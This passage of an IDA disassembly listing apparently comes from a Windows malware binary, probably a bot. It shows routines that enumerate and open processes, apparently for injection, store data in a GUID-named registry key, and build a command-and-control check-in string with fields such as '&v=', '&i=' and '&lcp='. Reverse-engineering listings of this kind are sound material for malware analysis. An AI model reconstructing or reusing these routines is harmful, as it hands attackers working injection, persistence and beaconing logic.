cmp eax, [ebp+var_C]
jz short loc_4084D7
lea eax, [ebp+var_218]
push eax
call sub_40A049
test al, al
pop ecx
jnz short loc_4084D7
push [ebp+var_234]
push esi
push 43Ah
call dword_40FE34 ; OpenProcess
mov edi, eax
cmp edi, esi
jz short loc_4084D7
push [ebp+var_234]
push edi
call sub_406E98
pop ecx
pop ecx
push edi
call dword_40FDAC ; CloseHandle
loc_4084D7: ; CODE XREF: sub_408413+77�j
; sub_408413+7F�j ...
lea eax, [ebp+var_23C]
push eax
push [ebp+var_4]
call dword_40FE1C ; Process32NextW
loc_4084E7: ; CODE XREF: sub_408413+6D�j
test eax, eax
jnz short loc_408482
push [ebp+var_4]
call dword_40FDAC ; CloseHandle
dec [ebp+var_8]
jnz loc_40845C
push [ebp+var_10]
push ebx
call dword_40FE48 ; SetThreadPriority
pop edi
pop esi
pop ebx
leave
retn
sub_408413 endp
; =============== S U B R O U T I N E =======================================
sub_40850C proc near ; CODE XREF: sub_40857D+49�p
; sub_40857D+F9�p
push ebx
xor ebx, ebx
mov word ptr [eax+4Ah], 7Dh
mov [eax+4Ch], bx
mov word ptr [eax], 7Bh
inc eax
push esi
mov esi, ecx
inc eax
loc_408523: ; CODE XREF: sub_40850C+6C�j
mov cl, [esi]
mov dl, cl
shr cl, 4
and dl, 0Fh
cmp cl, 0Ah
movzx ecx, cl
jnb short loc_40853A
add ecx, 30h
jmp short loc_40853D
; ---------------------------------------------------------------------------
loc_40853A: ; CODE XREF: sub_40850C+27�j
add ecx, 37h
loc_40853D: ; CODE XREF: sub_40850C+2C�j
cmp dl, 0Ah
mov [eax], cx
movzx ecx, dl
jnb short loc_40854D
add ecx, 30h
jmp short loc_408550
; ---------------------------------------------------------------------------
loc_40854D: ; CODE XREF: sub_40850C+3A�j
add ecx, 37h
loc_408550: ; CODE XREF: sub_40850C+3F�j
mov [eax+2], cx
add eax, 4
cmp bl, 3
jz short loc_40856B
cmp bl, 5
jz short loc_40856B
cmp bl, 7
jz short loc_40856B
cmp bl, 9
jnz short loc_408572
loc_40856B: ; CODE XREF: sub_40850C+4E�j
; sub_40850C+53�j ...
mov word ptr [eax], 2Dh
inc eax
inc eax
loc_408572: ; CODE XREF: sub_40850C+5D�j
inc esi
inc bl
cmp bl, 10h
jb short loc_408523
pop esi
pop ebx
retn
sub_40850C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40857D proc near ; DATA XREF: sub_4087B5+98�o
; .data:00419D73�o
var_58 = byte ptr -58h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
sub esp, 58h
cmp eax, 3
push ebx
push esi
push edi
jnz short loc_4085A5
mov eax, [ebp+arg_8]
and dword ptr [eax], 0
push dword_40FAB8
call dword_40FDBC ; SetEvent
jmp loc_4086ED
; ---------------------------------------------------------------------------
loc_4085A5: ; CODE XREF: sub_40857D+F�j
cmp eax, 10h
mov esi, [ebp+arg_8]
jnz loc_408659
cmp dword ptr [esi], 10h
jnz loc_4086EA
mov ebx, [ebp+arg_4]
xor edi, edi
mov [esi], edi
mov ecx, [ebx]
lea eax, [ebp+var_58]
call sub_40850C
push edi
lea eax, [ebp+var_4]
push eax
mov eax, dword_40FB34
push edi
push 1
push edi
push edi
push edi
push dword ptr [eax+3Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_408652
lea eax, [ebp+arg_0]
push eax
push edi
push edi
push edi
lea eax, [ebp+var_58]
push eax
push [ebp+var_4]
call dword_40FBDC
test eax, eax
jnz short loc_408649
push [ebp+arg_0]
call sub_4092F9
cmp eax, edi
pop ecx
mov [ebp+var_8], eax
jz short loc_408649
lea ecx, [ebp+arg_0]
push ecx
push eax
push edi
push edi
lea eax, [ebp+var_58]
push eax
push [ebp+var_4]
call dword_40FBDC
test eax, eax
jnz short loc_408640
push dword ptr [ebx]
call sub_409317
mov eax, [ebp+var_8]
mov [ebx], eax
mov eax, [ebp+arg_0]
mov [esi], eax
jmp short loc_408648
; ---------------------------------------------------------------------------
loc_408640: ; CODE XREF: sub_40857D+AE�j
push [ebp+var_8]
call sub_409317
loc_408648: ; CODE XREF: sub_40857D+C1�j
pop ecx
loc_408649: ; CODE XREF: sub_40857D+86�j
; sub_40857D+96�j
push [ebp+var_4]
call dword_40FBE4
loc_408652: ; CODE XREF: sub_40857D+6E�j
mov eax, [esi]
jmp loc_4086EF
; ---------------------------------------------------------------------------
loc_408659: ; CODE XREF: sub_40857D+2E�j
cmp eax, 0Fh
jz short loc_408667
cmp eax, 11h
jnz loc_4086EA
loc_408667: ; CODE XREF: sub_40857D+DF�j
cmp dword ptr [esi], 10h
jb short loc_4086EA
mov edi, [ebp+arg_4]
mov ecx, [edi]
lea eax, [ebp+var_58]
xor bl, bl
call sub_40850C
xor eax, eax
push eax
lea ecx, [ebp+var_4]
push ecx
push eax
push 2
push eax
push eax
push eax
mov eax, dword_40FB34
push dword ptr [eax+3Ch]
push 80000001h
call dword_40FBE0
test eax, eax
jnz short loc_4086E2
cmp [ebp+arg_0], 11h
jnz short loc_4086B4
lea eax, [ebp+var_58]
push eax
push [ebp+var_4]
call dword_40FBEC
jmp short loc_4086D1
; ---------------------------------------------------------------------------
loc_4086B4: ; CODE XREF: sub_40857D+126�j
mov eax, [esi]
sub eax, 10h
push eax
mov eax, [edi]
add eax, 10h
push eax
push 3
push 0
lea eax, [ebp+var_58]
push eax
push [ebp+var_4]
call dword_40FBE8
loc_4086D1: ; CODE XREF: sub_40857D+135�j
push [ebp+var_4]
mov ebx, eax
neg ebx
sbb bl, bl
inc bl
call dword_40FBE4
loc_4086E2: ; CODE XREF: sub_40857D+120�j
and dword ptr [esi], 0
movzx eax, bl
jmp short loc_4086EF
; ---------------------------------------------------------------------------
loc_4086EA: ; CODE XREF: sub_40857D+37�j
; sub_40857D+E4�j ...
and dword ptr [esi], 0
loc_4086ED: ; CODE XREF: sub_40857D+23�j
xor eax, eax
loc_4086EF: ; CODE XREF: sub_40857D+D7�j
; sub_40857D+16B�j
pop edi
pop esi
pop ebx
leave
retn
sub_40857D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086F4 proc near ; CODE XREF: sub_4087B5+EB�p
var_194 = byte ptr -194h
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 194h
mov eax, dword_40FC1C
movzx edx, byte ptr [eax+66h]
movzx ecx, byte ptr [eax+6Ah]
push ebx
add edx, eax
push esi
movzx esi, byte ptr [eax+64h]
mov al, [eax+65h]
add edx, ecx
xor ebx, ebx
lea ecx, [esi+edx+6Ch]
xor dl, dl
cmp al, bl
mov [ebp+var_1], bl
jbe short loc_408742
loc_408726: ; CODE XREF: sub_4086F4+46�j
movzx esi, dl
mov si, [ecx+esi*2]
cmp si, word_40FBAC
jz short loc_40873E
inc dl
cmp dl, al
jb short loc_408726
jmp short loc_408742
; ---------------------------------------------------------------------------
loc_40873E: ; CODE XREF: sub_4086F4+40�j
mov [ebp+var_1], 1
loc_408742: ; CODE XREF: sub_4086F4+30�j
; sub_4086F4+48�j
call sub_403B25
cmp [ebp+var_1], bl
jnz short loc_4087B1
call sub_408413
lea eax, [ebp+var_194]
push eax
push 2
call dword_40FCE4
inc dword_40FAB4
push ebx
push offset sub_40826C
call sub_40A263
inc dword_40FAB4
push ebx
push offset sub_40C000
call sub_40A263
inc dword_40FAB4
push ebx
push offset sub_40BC8E
call sub_40A263
inc dword_40FAB4
push ebx
push offset sub_408BAD
call sub_40A263
push offset dword_40FAB4
call sub_40412F
add esp, 24h
loc_4087B1: ; CODE XREF: sub_4086F4+56�j
pop esi
pop ebx
leave
retn
sub_4086F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4087B5 proc near ; DATA XREF: sub_4057EE:loc_4058EF�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
push edi
push 3Bh
call sub_40AAD4
pop ecx
call sub_406148
push 2
call dword_40FE50 ; GetCurrentThread
push eax
call dword_40FE48 ; SetThreadPriority
push 14h
push offset dword_40FAB4
call sub_40A94C
pop ecx
pop ecx
xor esi, esi
push esi
push esi
push 1
push esi
call dword_40FDC4 ; CreateEventW
push esi
push esi
push esi
mov dword_40FAB8, eax
mov eax, dword_40FB34
push esi
push dword ptr [eax+38h]
call dword_40FB3C
push 4
lea ecx, [ebp+var_4]
push ecx
push 2
push eax
mov dword_40FABC, eax
mov [ebp+var_4], 0EA60h
call dword_40FB8C
push esi
call sub_40AC72
push 0FFFFFFFFh
mov edi, offset off_40F3E8
push edi
call sub_4069E5
push 0FFFFFFFFh
push edi
push dword_40FD30
call sub_406A70
mov eax, dword_40FB34
push dword ptr [eax+2Ch]
push offset sub_40857D
call sub_40A95F
add esp, 20h
mov edi, eax
mov dword_40FAB4, esi
loc_408862: ; CODE XREF: sub_4087B5+E1�j
push 14h
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz short loc_40887E
mov dword_40FAB4, 1
loc_40887E: ; CODE XREF: sub_4087B5+BD�j
cmp dword_40FAB4, esi
jnz short loc_4088C5
mov eax, dword_40FB34
push dword ptr [eax+34h]
call sub_409588
test al, al
pop ecx
jnz short loc_408862
cmp dword_40FAB4, esi
jnz short loc_4088C5
call sub_4086F4
push 0FFFFFFFFh
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
jmp short loc_4088BD
; ---------------------------------------------------------------------------
loc_4088B5: ; CODE XREF: sub_4087B5+10E�j
push 14h
call dword_40FD68 ; Sleep
loc_4088BD: ; CODE XREF: sub_4087B5+FE�j
cmp dword_40FAB4, esi
ja short loc_4088B5
loc_4088C5: ; CODE XREF: sub_4087B5+CF�j
; sub_4087B5+E9�j
push dword_40FAB8
call dword_40FDAC ; CloseHandle
push dword_40FABC
call dword_40FB40
mov eax, dword_40FB34
push edi
push dword ptr [eax+2Ch]
call sub_40AA42
pop ecx
pop ecx
pop edi
pop esi
leave
retn
sub_4087B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4088F1 proc near ; DATA XREF: sub_408BAD+92�o
; .data:0041A165�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_8]
push eax
push 2
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call dword_40FB54
test eax, eax
jz loc_4089D2
push esi
push edi
loc_408917: ; CODE XREF: sub_4088F1+D9�j
cmp [ebp+var_8], 2
jnz loc_4089D0
cmp [ebp+var_4], 4
jbe loc_4089D0
push [ebp+var_4]
call sub_4092F9
mov edi, eax
test edi, edi
pop ecx
jz loc_4089D0
push dword_40FAB8
push [ebp+var_4]
push edi
push [ebp+arg_4]
call sub_405C0B
add esp, 10h
cmp eax, [ebp+var_4]
jnz short loc_4089B1
push 0Ch
call sub_4092F9
mov esi, eax
test esi, esi
pop ecx
jz short loc_4089AA
lea eax, [esi+4]
push eax
mov eax, [ebp+var_4]
add eax, 0FFFFFFFCh
push eax
lea eax, [edi+4]
push eax
call sub_409A6F
add esp, 0Ch
test eax, eax
mov [esi+8], eax
jz short loc_4089A3
push 4
push edi
push esi
call sub_409331
inc dword_40FAB4
push esi
push offset sub_407335
call sub_40A263
add esp, 14h
jmp short loc_4089AA
; ---------------------------------------------------------------------------
loc_4089A3: ; CODE XREF: sub_4088F1+91�j
push esi
call sub_409317
pop ecx
loc_4089AA: ; CODE XREF: sub_4088F1+73�j
; sub_4088F1+B0�j
push edi
call sub_409317
pop ecx
loc_4089B1: ; CODE XREF: sub_4088F1+65�j
and [ebp+var_4], 0
lea eax, [ebp+var_8]
push eax
push 2
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
call dword_40FB54
test eax, eax
jnz loc_408917
loc_4089D0: ; CODE XREF: sub_4088F1+2A�j
; sub_4088F1+34�j ...
pop edi
pop esi
loc_4089D2: ; CODE XREF: sub_4088F1+1E�j
mov al, 1
leave
retn 8
sub_4088F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4089D8 proc near ; DATA XREF: sub_408BAD+97�o
; .data:0041A16A�o
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_8]
xor eax, eax
sub esp, 10h
mov [ecx], eax
mov ecx, [ebp+arg_C]
push esi
mov esi, [ebp+arg_0]
mov [ecx], eax
mov cl, [esi]
mov dl, cl
inc dl
test cl, cl
mov [esi], dl
jbe short loc_408A01
xor al, al
jmp loc_408BA8
; ---------------------------------------------------------------------------
loc_408A01: ; CODE XREF: sub_4089D8+20�j
push ebx
mov [ebp+arg_C], eax
push edi
lea eax, [ebp+arg_C]
push eax
mov byte ptr [esi+2], 1
push dword_40FABC
call sub_4061D1
push 2
push offset a2 ; "2="
push [ebp+arg_4]
mov bl, al
call sub_40934F
add esp, 14h
push dword_40FB2C
mov edi, eax
call dword_40FD94 ; lstrlenA
push eax
push dword_40FB2C
push edi
call sub_40934F
push 3
pop edi
push edi
push offset aN ; "&n="
push eax
call sub_40934F
mov cl, [esi+1]
push edi
mov [eax], cl
inc eax
push offset aV ; "&v="
push eax
call sub_40934F
push 0Ah
pop esi
mov [ebp+arg_8], eax
push esi
lea eax, [ebp+var_10]
push eax
mov eax, dword_40FC1C
push dword ptr [eax+40h]
call sub_408F25
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_8]
call sub_40934F
push edi
push offset aI ; "&i="
push eax
call sub_40934F
mov [ebp+arg_8], eax
mov eax, dword_40FC1C
add esp, 48h
add eax, 44h
push 4
push eax
lea eax, [ebp+var_10]
push eax
call sub_409331
add esp, 0Ch
lea eax, [ebp+var_10]
push eax
mov [ebp+var_C], 0
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_8]
call sub_40934F
push edi
push offset aS ; "&s="
push eax
call sub_40934F
mov edi, eax
push esi
lea eax, [ebp+var_10]
push eax
push [ebp+arg_C]
call sub_408F25
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
push 4
push offset aSp ; "&sp="
push eax
call sub_40934F
movzx ecx, word_40FAC0
mov edi, eax
lea eax, [ebp+var_10]
push esi
push eax
mov al, bl
neg al
sbb eax, eax
not eax
and eax, ecx
push eax
call sub_408F25
add esp, 48h
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
push 5
push offset aLcp ; "&lcp="
push eax
call sub_40934F
movzx ecx, word_40FAC4
mov edi, eax
lea eax, [ebp+var_10]
push esi
push eax
mov al, bl
neg al
sbb eax, eax
not eax
and eax, ecx
push eax
call sub_408F25
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
push 4
push offset aPr ; "&pr="
push eax
call sub_40934F
neg bl
mov edi, eax
push esi
lea eax, [ebp+var_10]
push eax
movzx eax, word_40FAC2
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
call sub_408F25
add esp, 48h
push eax
lea eax, [ebp+var_10]
push eax
push edi
call sub_40934F
add esp, 0Ch
pop edi
mov byte ptr [eax], 0
mov al, 1
pop ebx
loc_408BA8: ; CODE XREF: sub_4089D8+24�j
pop esi
leave
retn 10h
sub_4089D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BAD proc near ; DATA XREF: sub_4086F4+A6�o
; sub_419C1A+A6�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 7D0h
call dword_40FD68 ; Sleep
lea eax, [ebp+var_10]
push eax
mov esi, offset dword_401468
push esi
call sub_40A476
xor ebx, ebx
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_8], eax
jz short loc_408C0A
cmp eax, 4
jz short loc_408BE6
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_408BFA
; ---------------------------------------------------------------------------
loc_408BE6: ; CODE XREF: sub_408BAD+31�j
push 4
push [ebp+var_10]
lea eax, [ebp+var_8]
push eax
mov [ebp+var_8], ebx
call sub_409331
add esp, 0Ch
loc_408BFA: ; CODE XREF: sub_408BAD+37�j
push [ebp+var_10]
call sub_409317
mov eax, [ebp+var_8]
cmp eax, ebx
pop ecx
jnz short loc_408C10
loc_408C0A: ; CODE XREF: sub_408BAD+2C�j
mov [ebp+var_3], 31h
jmp short loc_408C30
; ---------------------------------------------------------------------------
loc_408C10: ; CODE XREF: sub_408BAD+5B�j
mov ecx, dword_40FC1C
cmp eax, [ecx+40h]
jb short loc_408C2C
push 1388h
mov [ebp+var_3], 30h
call dword_40FD68 ; Sleep
jmp short loc_408C30
; ---------------------------------------------------------------------------
loc_408C2C: ; CODE XREF: sub_408BAD+6C�j
mov [ebp+var_3], 32h
loc_408C30: ; CODE XREF: sub_408BAD+61�j
; sub_408BAD+7D�j
mov [ebp+var_C], ebx
loc_408C33: ; CODE XREF: sub_408BAD+F2�j
mov eax, dword_40FC1C
mov edi, [eax+60h]
lea eax, [ebp+var_4]
push eax
push offset sub_4088F1
push offset sub_4089D8
push dword_40FABC
mov [ebp+var_4], bl
mov [ebp+var_2], bl
call sub_4063D8
add esp, 10h
test al, al
jz short loc_408C90
cmp [ebp+var_2], bl
jz short loc_408C90
mov eax, [ebp+var_C]
inc [ebp+var_C]
test eax, eax
jnz short loc_408C88
mov eax, dword_40FC1C
push 4
add eax, 40h
push eax
push esi
call sub_40A4C3
add esp, 0Ch
mov [ebp+var_3], 30h
loc_408C88: ; CODE XREF: sub_408BAD+C1�j
mov eax, dword_40FC1C
mov edi, [eax+5Ch]
loc_408C90: ; CODE XREF: sub_408BAD+B2�j
; sub_408BAD+B7�j
push edi
push dword_40FAB8
call dword_40FDB8 ; WaitForSingleObject
test eax, eax
jnz short loc_408C33
dec dword_40FAB4
pop edi
pop esi
pop ebx
leave
retn 4
sub_408BAD endp
; =============== S U B R O U T I N E =======================================
sub_408CAE proc near ; CODE XREF: sub_403723+209�p
; sub_403956+EC�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
test ecx, ecx
jz short loc_408CD1
mov eax, [esp+arg_4]
cmp eax, 2
jb short loc_408CD1
add eax, ecx
cmp byte ptr [eax-1], 0
jnz short loc_408CD1
cmp byte ptr [eax-2], 0
jnz short loc_408CD1
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_408CD1: ; CODE XREF: sub_408CAE+6�j
; sub_408CAE+F�j ...
xor eax, eax
retn
sub_408CAE endp
; =============== S U B R O U T I N E =======================================
sub_408CD4 proc near ; CODE XREF: sub_403956+15C�p
; sub_405E38+BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
xor eax, eax
xor edx, edx
loc_408CDC: ; CODE XREF: sub_408CD4+1D�j
cmp byte ptr [eax+ecx], 0
jnz short loc_408CF0
cmp byte ptr [eax+ecx+1], 0
jz short loc_408CF3
inc edx
cmp edx, [esp+arg_4]
jz short loc_408CF6
loc_408CF0: ; CODE XREF: sub_408CD4+C�j
inc eax
jmp short loc_408CDC
; ---------------------------------------------------------------------------
loc_408CF3: ; CODE XREF: sub_408CD4+13�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408CF6: ; CODE XREF: sub_408CD4+1A�j
lea eax, [eax+ecx+1]
retn
sub_408CD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408CFB proc near ; CODE XREF: sub_4061D1+178�p
; sub_407BDB+19E�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
xor esi, esi
test byte ptr [ebp+arg_18], 8
push edi
jz short loc_408D83
mov edi, [ebp+arg_14]
and [ebp+arg_18], 0FFFFFFF7h
cmp edi, esi
jz short loc_408D20
cmp dword ptr [edi], 0FFFFFFFFh
mov [ebp+var_1], 1
jz short loc_408D24
loc_408D20: ; CODE XREF: sub_408CFB+1A�j
mov [ebp+var_1], 0
loc_408D24: ; CODE XREF: sub_408CFB+23�j
mov ebx, [ebp+arg_10]
cmp ebx, esi
jnz short loc_408D2E
lea ebx, [ebp+var_10]
loc_408D2E: ; CODE XREF: sub_408CFB+2E�j
cmp [ebp+arg_C], esi
jbe short loc_408D5C
loc_408D33: ; CODE XREF: sub_408CFB+5F�j
push [ebp+arg_18]
mov eax, [ebp+arg_C]
push edi
push ebx
sub eax, esi
push eax
mov eax, [ebp+arg_8]
add eax, esi
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_408CFB
add esp, 1Ch
test al, al
jnz short loc_408D63
inc esi
cmp esi, [ebp+arg_C]
jb short loc_408D33
loc_408D5C: ; CODE XREF: sub_408CFB+36�j
; sub_408CFB+C6�j ...
xor al, al
loc_408D5E: ; CODE XREF: sub_408CFB+188�j
; sub_408CFB+195�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408D63: ; CODE XREF: sub_408CFB+59�j
cmp [ebp+var_1], 0
jz short loc_408D74
mov eax, [edi]
cmp eax, 0FFFFFFFFh
jz short loc_408D74
add eax, esi
mov [edi], eax
loc_408D74: ; CODE XREF: sub_408CFB+6C�j
; sub_408CFB+73�j
test ebx, ebx
jz loc_408E81
add [ebx], esi
jmp loc_408E81
; ---------------------------------------------------------------------------
loc_408D83: ; CODE XREF: sub_408CFB+F�j
mov edi, [ebp+arg_4]
xor ebx, ebx
test edi, edi
jz loc_408E78
mov eax, [ebp+arg_18]
and eax, 2
mov [ebp+var_10], eax
xor eax, eax
inc eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
loc_408DA2: ; CODE XREF: sub_408CFB+177�j
cmp [ebp+var_10], 0
mov eax, [ebp+arg_0]
mov dl, [ebx+eax]
jnz short loc_408DB9
mov al, dl
sub al, 41h
cmp al, 19h
ja short loc_408DB9
add dl, 20h
loc_408DB9: ; CODE XREF: sub_408CFB+B1�j
; sub_408CFB+B9�j
cmp dl, 23h
jnz short loc_408DC8
cmp esi, [ebp+arg_C]
jz short loc_408D5C
jmp loc_408E65
; ---------------------------------------------------------------------------
loc_408DC8: ; CODE XREF: sub_408CFB+C1�j
cmp dl, 2Ah
jz loc_408E95
cmp [ebp+var_10], 0
mov eax, [ebp+arg_8]
mov cl, [esi+eax]
jnz short loc_408DEF
cmp cl, 41h
jl short loc_408DEF
cmp cl, 5Ah
jg short loc_408DEF
movsx eax, cl
add eax, 20h
jmp short loc_408DF2
; ---------------------------------------------------------------------------
loc_408DEF: ; CODE XREF: sub_408CFB+E0�j
; sub_408CFB+E5�j ...
movsx eax, cl
loc_408DF2: ; CODE XREF: sub_408CFB+F2�j
movsx edi, dl
cmp edi, eax
jz short loc_408E57
test byte ptr [ebp+arg_18], 1
jz loc_408D5C
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_C]
jnb short loc_408E25
cmp cl, 0Dh
jnz short loc_408E25
mov eax, [ebp+arg_8]
cmp byte ptr [esi+eax+1], 0Ah
jnz short loc_408E25
cmp dl, 0Ah
jnz short loc_408E25
inc esi
inc [ebp+var_8]
jmp short loc_408E65
; ---------------------------------------------------------------------------
loc_408E25: ; CODE XREF: sub_408CFB+10E�j
; sub_408CFB+113�j ...
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb loc_408D5C
cmp dl, 0Dh
jnz loc_408D5C
mov eax, [ebp+arg_0]
cmp byte ptr [ebx+eax+1], 0Ah
jnz loc_408D5C
cmp cl, 0Ah
jnz loc_408D5C
inc ebx
inc [ebp+var_C]
jmp short loc_408E65
; ---------------------------------------------------------------------------
loc_408E57: ; CODE XREF: sub_408CFB+FC�j
mov eax, [ebp+arg_14]
test eax, eax
jz short loc_408E65
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_408E65
mov [eax], esi
loc_408E65: ; CODE XREF: sub_408CFB+C8�j
; sub_408CFB+128�j ...
mov edi, [ebp+arg_4]
inc esi
inc [ebp+var_8]
inc ebx
inc [ebp+var_C]
cmp ebx, edi
jnz loc_408DA2
loc_408E78: ; CODE XREF: sub_408CFB+8F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_408E88
mov [eax], esi
loc_408E81: ; CODE XREF: sub_408CFB+7B�j
; sub_408CFB+83�j ...
mov al, 1
jmp loc_408D5E
; ---------------------------------------------------------------------------
loc_408E88: ; CODE XREF: sub_408CFB+182�j
xor eax, eax
cmp esi, [ebp+arg_C]
setz al
jmp loc_408D5E
; ---------------------------------------------------------------------------
loc_408E95: ; CODE XREF: sub_408CFB+D0�j
lea eax, [ebx+1]
cmp eax, edi
jnz short loc_408EAA
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_408E81
mov ecx, [ebp+arg_C]
mov [eax], ecx
jmp short loc_408E81
; ---------------------------------------------------------------------------
loc_408EAA: ; CODE XREF: sub_408CFB+19F�j
mov eax, [ebp+arg_14]
test eax, eax
jz short loc_408EBA
cmp dword ptr [eax], 0FFFFFFFFh
mov [ebp+var_1], 1
jz short loc_408EBE
loc_408EBA: ; CODE XREF: sub_408CFB+1B4�j
mov [ebp+var_1], 0
loc_408EBE: ; CODE XREF: sub_408CFB+1BD�j
cmp esi, [ebp+arg_C]
jnb loc_408D5C
mov eax, [ebp+arg_0]
sub edi, ebx
dec edi
lea ebx, [ebx+eax+1]
loc_408ED1: ; CODE XREF: sub_408CFB+1FD�j
push [ebp+arg_18]
mov eax, [ebp+arg_C]
push [ebp+arg_14]
sub eax, esi
push [ebp+arg_10]
push eax
mov eax, [ebp+arg_8]
add eax, esi
push eax
push edi
push ebx
call sub_408CFB
add esp, 1Ch
test al, al
jnz short loc_408EFF
inc esi
cmp esi, [ebp+arg_C]
jb short loc_408ED1
jmp loc_408D5C
; ---------------------------------------------------------------------------
loc_408EFF: ; CODE XREF: sub_408CFB+1F7�j
cmp [ebp+var_1], 0
jz short loc_408F13
mov ecx, [ebp+arg_14]
mov eax, [ecx]
cmp eax, 0FFFFFFFFh
jz short loc_408F13
add eax, esi
mov [ecx], eax
loc_408F13: ; CODE XREF: sub_408CFB+208�j
; sub_408CFB+212�j
mov eax, [ebp+arg_10]
test eax, eax
jz loc_408E81
add [eax], esi
jmp loc_408E81
sub_408CFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F25 proc near ; CODE XREF: sub_4072A7+70�p
; sub_4089D8+A4�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
movzx edi, [ebp+arg_8]
mov ecx, esi
loc_408F34: ; CODE XREF: sub_408F25+2B�j
mov eax, [ebp+arg_0]
xor edx, edx
div edi
cmp edx, 9
mov [ebp+arg_0], eax
lea eax, [edx+37h]
ja short loc_408F49
lea eax, [edx+30h]
loc_408F49: ; CODE XREF: sub_408F25+1F�j
mov [ecx], al
inc ecx
cmp [ebp+arg_0], 0
ja short loc_408F34
mov eax, ecx
sub eax, esi
mov byte ptr [ecx], 0
dec ecx
loc_408F5A: ; CODE XREF: sub_408F25+41�j
mov bl, [esi]
mov dl, [ecx]
mov [ecx], bl
dec ecx
mov [esi], dl
inc esi
cmp esi, ecx
jb short loc_408F5A
pop edi
pop esi
pop ebx
pop ebp
retn
sub_408F25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408F6D proc near ; CODE XREF: sub_4041D9+25�p
; sub_404AAD+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
cmp eax, 0FFFFFFFFh
push ebx
push esi
mov esi, [ebp+arg_C]
push edi
jnz short loc_408FA5
cmp esi, eax
jnz short loc_408FBA
mov esi, [ebp+arg_4]
mov edx, [ebp+arg_0]
jmp short loc_408F94
; ---------------------------------------------------------------------------
loc_408F8A: ; CODE XREF: sub_408F6D+31�j
test cl, cl
jz loc_40903E
inc edx
inc esi
loc_408F94: ; CODE XREF: sub_408F6D+1B�j
mov cl, [esi]
movsx eax, byte ptr [edx]
movsx edi, cl
sub eax, edi
jz short loc_408F8A
jmp loc_40903E
; ---------------------------------------------------------------------------
loc_408FA5: ; CODE XREF: sub_408F6D+F�j
cmp esi, 0FFFFFFFFh
jz short loc_408FB2
cmp eax, esi
jnz loc_40903C
loc_408FB2: ; CODE XREF: sub_408F6D+3B�j
test eax, eax
jz loc_40903C
loc_408FBA: ; CODE XREF: sub_408F6D+13�j
test esi, esi
jz short loc_40903C
mov edx, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov ecx, eax
inc ecx
add eax, edx
neg ecx
sbb ecx, ecx
and ecx, eax
mov eax, esi
inc eax
add esi, edi
neg eax
sbb eax, eax
and eax, esi
jmp short loc_408FFC
; ---------------------------------------------------------------------------
loc_408FDC: ; CODE XREF: sub_408F6D+91�j
cmp edi, eax
jz short loc_409000
test ecx, ecx
jnz short loc_408FE8
